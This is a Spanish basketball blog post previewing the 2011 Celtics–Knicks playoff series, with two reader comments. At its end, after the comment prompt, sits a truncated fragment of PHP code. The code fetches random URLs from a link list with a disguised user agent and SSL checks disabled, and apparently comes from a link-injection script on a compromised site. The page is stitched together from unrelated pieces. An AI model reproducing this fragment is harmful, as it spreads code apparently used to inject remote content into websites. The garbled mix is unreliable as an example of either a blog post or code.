Análisis Boston Celtics vs New York Knicks

17 de April de 2011 por Jabho

Regular: 4-0 para Boston

Celtics: 96.5 PF – 91.1 PC (+5.4)
Knicks: 106.5 PF – 105.7 PC (+0.8)

Como cada año desde que se juntó el Big Three, Boston llega a su cita con los Playoffs tras una temporada de más a menos, y este año además con un final de regular season en el que se ha mostrado especialmente espeso en ataque. Si a eso le añades un controvertido traspaso que ha tocado el corazon del vestuario verde y muchas lesiones, más de las esperadas aún contando la edad de la plantilla, las dudas están servidas. Parece quedar lejos el principio de temporada con los verdes circulando bien la pelota, anotando por encima del 50% acierto y pareciendo mucho hueso para cualquiera de sus rivales de conferencia. Por contra, desde el All Star se han sucedido los partidos en los que los Celtics han añadido a sus problemas con el rebote, dificultades para anotar en ataque estático y minutos para los 5 jugadores nuevos del equipo.

Enfrente estarán los Knicks que ya hace años que no se veían por estas lides. Mucha espera,demasiada para una franquicia histórica, lo que añade algo de presión extra al asunto. La temporada de los Knicks tiene un antes y un después del trade Melo. Antes fue un equipo que al ritmo de D´Antoni y Felton, con Amare anotando y un reparto coral, pintaban a rival cuanto menos incómodo. Después el equipo se ha quedado muy corto, especialmente en la pintura, con un base al que no le va jugar rápido y dos estrellas con tendencia a acumular tiros. Sólo una racha de 7 victorias consecutivas poco antes de acabar la temporada les ha permitido asegurar la 6ª plaza y mirar con algo de optimismo estos Playoffs.

Mas allá de ganar o perder va a ser una eliminatoria de sensaciones. Boston debe ganar, pero casi tan importante como ganar es que recupere las sensaciones de principio de temporada si quiere tener opciones en las curvas que se avecinan. A los Knicks, por su parte, les puede valer perder, siempre que el Madison vibre. Por hacer sudar a los verdes, con los que además hay cierta rivalidad, a Spike y compañia les habrá merecido la pena la espera y Melo.

Claves de la eliminatoria:

– Defensa: Los Kincks son de largo el equipo que peor defiende de los clasificados en Playoffs. Ni tienen buenos defensores individuales ni la preocupación de hacer una buena defensa como equipo. Los Celtics son el mejor equipo de la liga en defensa, y desde el All Star en adelante el ataque no habrá funcionado, pero la defensa ha sido mejor que antes del All Star.

– Duelo de bases: Rondo es sin lugar a dudas el termómetro de los Celtics. Su bajo estado de forma en marzo y abril lo ha notado Boston y de qué forma. Se enfrenta a Billups, un base alto y listo, pero más lento y que debería sufrir mucho en su defensa. Si a eso añades que las ayudas de los interiores de los Knicks no brillan por su fiereza, se presenta una eliminatoria ideal para que Rondo recupere ritmo y pick’n’roll.

– Melo&Stoudemire: Tras una larga travesía por el desierto, por fin los Knicks tienen dos estrellas sobre las que construir una franquicia ganadora. El primer paso es demostrar que saben convivir y eso pasa por poner su juego en beneficio del equipo (y en esto tienen un buen espejo en el Big Three). De que se apliquen en defensa y sepan administrar sus tiros dependerá que se alargue la serie.

– Shaquille O´neal: No se antoja clave para esta eliminatoria pero si para las siguientes. En caso de volver, los Knicks no tienen ningún jugador que pueda soñar con oponerse a Shaq los minutos que esté en pista. Con o sin Shaq, el juego interior verde debería imponerse sin problemas.

– Modo Playoffs On: Los Celtics llevan 3 años activando el modo Play Offs cuando llega el momento y compitiendo en cada eliminatoria jugada, ganando muchas y haciendo sudar sangre al contrario en todas. Con el fin de ciclo en el horizonte de los verdes, este año no debería ser distinto. Y si es así, las opciones de los Knicks serán ninguna.

Pronostico: 4-1 para los Celtics

Comenta

2 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Desgraciadamente, coincido con el pronóstico, es más, creo que el partido que pueda ganar los Knicks va a ser difícil, muy difícil. Esperemos que los problemas defensivos sean observados, destacados y corregidos con buenos traspasos, y poder tener alguien poderoso bajo aro. En Celtics, cuando Allen-Pierce se pongan algo las pilas llegarán más o menos a la rentabilidad Melo-Stoudemire, el problema es que Rondo es mejor que Billups y que Garnett va a estar tranquilito, o bien si se pegan Amaré y él creo que el verde tiene las de ganar. No decir nada cuando salgan O´Neal (ambos) o Davis…
    Esperemos que este año sea el primero de muchos para el Madison, y que esta siembra de buena cosecha… y no tempestades.

      Citar

  2. German dice:
    #2

    Extraño mucho a los Celtics de principio de temporada y especialmente a ese Rondo. Para mi salieron perdiendo traspasando a Perkins pero de volver Shaq van a resolverlo muy bien. De todas formas confio en que activen el Modo Playoffs una vez mas y saquen adelante esta serie. 4-2 Boston.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>